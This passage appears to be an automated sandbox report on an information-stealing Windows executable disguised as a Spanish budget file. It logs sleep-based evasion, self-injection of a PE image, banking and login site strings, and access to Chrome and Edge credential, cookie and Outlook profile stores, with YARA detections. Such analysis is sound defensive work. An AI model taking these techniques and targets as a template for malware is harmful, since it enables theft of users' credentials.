Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597172s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -597063s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596938s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596813s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596688s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596578s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596469s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596344s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596234s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596125s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -596016s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595906s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595797s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595687s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595578s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595469s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595344s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595234s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595125s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -595016s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594905s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594797s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594687s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594578s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe TID: 7696	Thread sleep time: -594469s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599875			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599756			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599641			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599531			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599422			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599313			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598828			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598711			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598609			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598499			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598378			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598266			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598156			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 598046			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597828			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597719			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597609			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597500			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597390			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597281			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597172			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 597063			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596938			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596813			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596688			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596469			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596344			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596234			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596125			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 596016			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595906			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595797			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595687			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595469			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595344			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595234			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595125			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 595016			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594905			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594797			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594687			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594578			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Thread delayed: delay time: 594469			Jump to behavior

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748822121.00000000014C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $_qEmultipart/form-data; boundary=------------------------8dcfa7be7f62c54<
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.00000000043E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Code function: 5_2_05C19548 LdrInitializeThunk,

5_2_05C19548

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Memory written: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process created: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe "C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match

File source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Remote Access Functionality

Source: Yara match

File source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR